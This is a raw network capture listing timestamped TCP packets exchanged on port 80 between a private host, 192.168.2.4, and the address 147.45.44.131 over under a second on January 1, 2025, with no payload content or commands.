Jan 1, 2025 08:54:03.380744934 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.380748034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380759001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380768061 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.380769968 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380780935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380791903 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.380799055 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.380817890 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383423090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383461952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383469105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383472919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383497000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383512974 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383548021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383594990 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383610010 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383620977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383630037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383639097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383661985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383701086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383723974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383735895 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383774996 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383816004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383826971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383837938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383847952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383857965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.383872032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.383899927 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384062052 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384073019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384083033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384094000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384104013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384110928 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384114981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384125948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384126902 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384138107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384159088 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384171963 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384207964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384219885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384228945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384254932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384277105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384347916 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384358883 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384367943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384377956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384388924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384398937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384406090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384438992 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384478092 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384563923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384574890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384584904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384596109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384604931 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384607077 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384622097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384634972 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384663105 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384777069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384788036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384799004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384824991 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384855986 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384865046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384876966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384887934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384896040 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.384927034 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.384953022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470082045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470097065 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470108032 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470119953 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470129013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470140934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470223904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470266104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470350981 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470365047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470375061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470386982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470410109 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470434904 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470508099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470519066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470530033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470539093 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470550060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470558882 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470560074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470582008 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470604897 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470654964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470666885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470678091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470706940 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470824957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470835924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470845938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470855951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470866919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.470866919 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470909119 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.470937014 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471329927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471339941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471350908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471360922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471371889 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471379042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471383095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471395016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471404076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471412897 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471412897 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471425056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471431971 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471436024 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471447945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471448898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471458912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471470118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471477032 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471481085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.471507072 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.471534014 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472019911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472031116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472040892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472050905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472060919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472070932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472071886 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472084045 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472095966 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472131968 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472170115 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472182035 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472192049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472202063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472210884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472219944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472220898 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472233057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472242117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472256899 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472260952 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472804070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472815990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472834110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472845078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472851992 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472887039 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472903013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472937107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472949982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472959042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472970009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472979069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472985983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.472990036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.472996950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473002911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473006964 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.473014116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473028898 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473038912 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473042011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.473066092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.473587036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473598003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473639965 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.473750114 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473762989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473772049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.473793983 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.473819971 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475164890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475177050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475187063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475239038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475255013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475274086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475284100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475296021 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475305080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475322008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475332022 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475338936 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475343943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475357056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475368023 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475368023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475378990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475392103 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475395918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475406885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475413084 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475418091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475428104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475434065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475438118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475449085 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475462914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475462914 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475472927 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475482941 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475482941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475495100 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475498915 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475506067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475516081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475519896 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475527048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475538015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475538969 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475548983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475559950 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475568056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475572109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475591898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475605011 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475764036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475775003 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475785017 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475799084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475827932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475841045 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475917101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475929976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475939989 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475953102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475960970 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.475965023 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.475974083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.476006985 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.476119041 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.476130009 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.476167917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560085058 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560096979 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560106993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560163021 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560175896 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560188055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560199976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560224056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560246944 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560292006 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560302973 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560313940 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560339928 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560432911 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560442924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560452938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560463905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560473919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560483932 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560483932 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560513020 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560704947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560715914 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560755014 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560823917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560833931 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560843945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560853004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560863018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560878038 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560878038 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560892105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560902119 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560903072 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560914993 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.560941935 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.560969114 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561172962 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561183929 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561193943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561204910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561213970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561223984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561232090 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561239958 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561249971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561254978 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561260939 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561279058 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561299086 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561573982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561583996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561599970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561611891 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561620951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561624050 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561633110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561644077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561647892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561659098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561667919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561670065 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561680079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.561688900 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.561712027 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562149048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562160015 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562169075 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562180042 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562190056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562199116 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562200069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562211037 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562221050 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562231064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562232018 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562242985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562252045 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562253952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562264919 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562275887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562277079 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562285900 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562297106 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562298059 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562309027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562319994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562320948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.562341928 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562366962 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.562902927 CET	80	49730	147.45.44.131	192.168.2.4
